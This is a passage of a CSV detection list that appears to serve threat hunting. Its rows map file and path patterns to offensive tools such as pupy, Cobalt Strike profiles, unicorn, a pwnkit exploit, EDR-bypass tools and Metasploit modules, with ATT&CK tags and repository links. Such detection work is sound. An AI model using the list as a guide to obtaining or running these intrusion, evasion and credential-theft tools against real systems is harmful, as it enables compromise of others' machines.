+"*/UnhookingPatch.git*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*/unicorn.git*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" +"*/unicorn.py*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" +"*/unittest.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/unshackle.git*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*/unshackle.modules*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*/unused/locktest.sh*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/unused/Yosemite.patch*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/unusual-port.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/updog-*.tar.gz*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*/updog.git*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*/updog/archive/updog-*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*/upnp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/uptime-agent-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/url-snarf.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/user_data/*/keylog.txt*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" +"*/userenum.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*/UserlandBypass/*.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*/username-anarchy*","offensive_tool_keyword","username-anarchy","Tools for generating usernames when penetration testing. Usernames are half the password brute force problem.","T1110 - T1134 - T1078","TA0006","N/A","N/A","Credential Access","https://github.com/urbanadventurer/username-anarchy","1","1","N/A","N/A","6","564","113","2022-01-26T18:34:02Z","2012-11-07T05:35:10Z" +"*/UserNamespaceOverlayfsSetuidWriteExec/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/usniper.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/usr/bin/pkexec*","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034","1","1","N/A","N/A","1","97","16","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" +"*/usr/bin/polenum*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*/usr/local/bin/exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/usr/local/pwndrop/*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" +"*/usr/share/cobaltstrike/*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" +"*/usr/share/wordlists/*.txt*","offensive_tool_keyword","fcrackzip","a Free/Fast Zip Password Cracker","T1473 - T1021.002","TA0005 - TA0008","N/A","N/A","Credential Access","https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/utils/addcomputer.py*","offensive_tool_keyword","sam-the-admin","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1208 - T1218.005 - T1055.002","TA0006 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","0","N/A","N/A","10","929","190","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z" +"*/utils/obfuscate.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/UTWOqVQ132/*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/UUID_bypass.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*/vainject.c*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/vajra/phishApp.py*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" +"*/var/lib/ptunnel*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"*/var/log/exegol/*.log*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/veeam_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/Vegile.git*","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","686","175","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" +"*/venom.git*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/venom.sh *","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/venom/","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/ventrilo-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/versant-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/viper.conf*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/viper.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/viper.sln*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/viper/Docker/*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/viper/Docker/nginxconfig/htpasswd*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/vipermsf*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*/viperpython*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/viperpython.git*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/virtualenvs/icebreaker*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*/VirusTotalC2/*","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","10","10","5","81","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z" +"*/VisualBasicObfuscator*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" +"*/vmauthd-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/vmware_enum_*.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/VMware-CVE-2022-22954*","offensive_tool_keyword","POC","POC for VMWARE CVE-2022-22954","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/sherlocksecurity/VMware-CVE-2022-22954","1","1","N/A","N/A","3","285","53","2022-04-13T06:15:11Z","2022-04-11T13:59:23Z" +"*/vmware-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/vnc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/vncdll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/vncdll/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/vncEncoder.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/VNCHooks*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 